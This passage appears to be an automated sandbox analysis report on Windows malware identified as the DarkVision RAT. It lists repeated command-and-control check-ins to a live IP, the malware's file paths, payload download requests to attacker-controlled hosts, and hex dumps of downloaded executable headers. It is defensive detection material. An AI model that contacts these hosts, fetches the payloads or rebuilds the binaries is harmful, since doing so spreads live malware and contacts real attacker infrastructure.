                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_009135CC FindFirstFileA,FindNextFileA,FindClose,8_2_009135CC
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 8_2_00931C54 __doserrno,_errno,_errno,__doserrno,FindFirstFileA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,8_2_00931C54

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49688 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49690 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49692 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49693 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49726 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49747 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49779 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49780 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49781 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49790 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49791 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49789 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49788 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49782 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49787 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49794 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49793 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49801 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49804 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49809 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49813 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49805 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49802 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49810 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49807 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49820 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49803 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49819 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49830 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49815 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49812 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49825 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49808 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49822 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49832 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49831 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49797 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49823 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49784 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49783 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49817 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49800 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49811 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49826 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49833 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49824 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49816 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49806 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49829 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49818 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49828 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49792 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49799 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49778 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49785 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49798 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49796 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49821 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49814 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49795 -> 82.29.67.160:443
                    Source: Network trafficSuricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49827 -> 82.29.67.160:443
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorIPs: 82.29.67.160
                    Creates HTML files with .exe extension (expired dropper behavior)
                    Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeFile created: 303465c5.exe.11.dr
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.22.1Date: Fri, 04 Apr 2025 06:44:15 GMTContent-Type: application/octet-streamContent-Length: 1975808Last-Modified: Wed, 02 Apr 2025 13:30:10 GMTConnection: keep-aliveETag: "67ed3be2-1e2600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 08 00 14 fa ce 67 00 00 00 00 00 00 00 00 f0 00 23 00 0b 02 09 00 00 ba 00 00 00 68 19 00 00 00 00 00 75 3b 40 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 50 43 00 00 04 00 00 00 00 00 00 02 00 00 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 48 3f 00 3c 00 00 00 00 e0 42 00 46 6b 00 00 60 a2 42 00 90 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 25 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c2 b9 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 44 2a 00 00 00 d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 ba 18 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 c8 07 00 00 00 c0 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 73 73 30 00 00 00 00 00 a7 3d 0b 00 00 d0 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 73 73 31 00 00 00 00 00 50 00 00 00 00 10 25 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 73 73 32 00 00 00 00 00 f0 b2 1d 00 00 20 25 00 00 b4 1d 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 68 2e 72 73 72 63 00 00 00 46 6b 00 00 00 e0 42 00 00 6c 00 00 00 ba 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.22.1Date: Fri, 04 Apr 2025 06:44:23 GMTContent-Type: application/octet-streamContent-Length: 1400832Last-Modified: Sat, 22 Mar 2025 01:09:32 GMTConnection: keep-aliveETag: "67de0dcc-156000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 08 00 bc 0b de 67 00 00 00 00 00 00 00 00 f0 00 23 00 0b 02 09 00 00 3a 07 00 00 ca 01 00 00 00 00 00 41 3f 2a 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 d0 2b 00 00 04 00 00 5f c9 15 00 02 00 00 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 b9 24 00 a0 00 00 00 00 c0 2b 00 b2 01 00 00 a0 4f 2b 00 bc 67 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 16 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f5 38 07 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 92 52 01 00 00 50 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 64 6d 00 00 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 f4 3e 00 00 00 20 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 73 30 30 00 00 00 00 00 68 ee 0c 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 73 30 31 00 00 00 00 00 a0 00 00 00 00 50 16 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 73 30 32 00 00 00 00 00 5c 57 15 00 00 60 16 00 00 58 15 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 68 2e 72 73 72 63 00 00 00 b2 01 00 00 00 c0 2b 00 00 02 00 00 00 5e 15 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: Joe Sandbox ViewIP Address: 4.28.136.57 4.28.136.57
                    Source: Joe Sandbox ViewIP Address: 104.26.8.202 104.26.8.202
                    Source: Joe Sandbox ViewIP Address: 107.174.192.179 107.174.192.179
                    Source: Joe Sandbox ViewASN Name: NTLGB NTLGB
                    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49689 -> 104.26.8.202:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49691 -> 104.26.8.202:443
                    Source: global trafficHTTP traffic detected: GET /ZATFQO HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: grabify.link
                    Source: global trafficHTTP traffic detected: GET /images/pixel.png HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: grabify.linkCookie: g_session=eyJpdiI6IkY2WEtLTU1vWVhUSUp6VVdjTzkwd0E9PSIsInZhbHVlIjoia01wOWxMK2ZrTXh0RUoxZ1VJWjdPMGI5VkVMMm5MUlM3b2pRdmpnRlFSUDJCSnh4bUtnakx5dTBRVmZiMDdMZldEYVFvOXNPUWpZMnFUUU5zeEZDeEdtY1g2NFY3cmUvTnV0WVNrTzRESmd2VkJEZ24yVmc0b05USllyNjVmbkciLCJtYWMiOiI2ZGM4MjczNjczZDNlNThkNTI3NjI1YzM3ZTQwZGIxMjRjM2I0OGJkYjBjZDBlYTE1NjVkZTEzZDgwZDI1NWE2IiwidGFnIjoiIn0%3D; XSRF-TOKEN=eyJpdiI6ImZHMC9uUEtPdXFMaVRMTS9qN0ZEMnc9PSIsInZhbHVlIjoiMlFNaFhBcEYyMitWNmVXNlpFdEdKQVFvWnJPZXE0R1pCbnlFdC92dzJCaGVnQnMxdUo5ZWQ4Z1Ewd25DeUppaWNUWnJNOHRzalRpc3ZucWJUQjU0Z2dmWlBobUZqZnl1K3VvdGNkRFdNeW1wcTdhdUx4N3YySVBBSHI5WTRGWWYiLCJtYWMiOiJiYmQzM2IyMWI1ZGE0OWNhYTJkMGU4YjY2MzZmYmQ2YmRjZTViMGJjOTlkOGM1NDVjN2I1ZTcxMmJkMzMzNDQ2IiwidGFnIjoiIn0%3D
                    Source: global trafficHTTP traffic detected: HEAD /devbuilds/KVRT/latest/full/KVRT.exe HTTP/1.1Host: devbuilds.s.kaspersky-labs.comRange: bytes=0-0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.808.57Accept: */*
                    Source: global trafficHTTP traffic detected: GET /devbuilds/KVRT/latest/full/KVRT.exe HTTP/1.1Host: devbuilds.s.kaspersky-labs.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.808.57Accept: */*
                    Source: global trafficHTTP traffic detected: HEAD /devbuilds/KVRT/latest/full/KVRT.exe HTTP/1.1Host: devbuilds.s.kaspersky-labs.comRange: bytes=0-0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.808.57Accept: */*
                    Source: global trafficHTTP traffic detected: GET /devbuilds/KVRT/latest/full/KVRT.exe HTTP/1.1Host: devbuilds.s.kaspersky-labs.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.808.57Accept: */*
                    Source: global trafficHTTP traffic detected: HEAD /devbuilds/KVRT/latest/full/KVRT.exe HTTP/1.1Host: devbuilds.s.kaspersky-labs.comRange: bytes=0-0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.808.57Accept: */*
                    Source: global trafficHTTP traffic detected: GET /devbuilds/KVRT/latest/full/KVRT.exe HTTP/1.1Host: devbuilds.s.kaspersky-labs.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.808.57Accept: */*
                    Source: global trafficHTTP traffic detected: HEAD /devbuilds/KVRT/latest/full/KVRT.exe HTTP/1.1Host: devbuilds.s.kaspersky-labs.comRange: bytes=0-0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.808.57Accept: */*
                    Source: global trafficHTTP traffic detected: GET /devbuilds/KVRT/latest/full/KVRT.exe HTTP/1.1Host: devbuilds.s.kaspersky-labs.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.808.57Accept: */*
                    Source: global trafficHTTP traffic detected: HEAD /devbuilds/KVRT/latest/full/KVRT.exe HTTP/1.1Host: devbuilds.s.kaspersky-labs.comRange: bytes=0-0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.808.57Accept: */*
                    Source: global trafficHTTP traffic detected: GET /devbuilds/KVRT/latest/full/KVRT.exe HTTP/1.1Host: devbuilds.s.kaspersky-labs.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.808.57Accept: */*
                    Source: global trafficHTTP traffic detected: GET /data/003 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: 107.174.192.179
                    Source: global trafficHTTP traffic detected: GET /clean HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: 107.174.192.179
                    Source: global trafficHTTP traffic detected: HEAD /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=0-0User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=0-16383User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=16384-32767User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=32768-49151User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=49152-65535User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=98304-114687User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=81920-98303User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=65536-81919User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=114688-131071User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=131072-163839User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=163840-196607User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=196608-229375User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=229376-262143User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                    Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=262144-294911User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
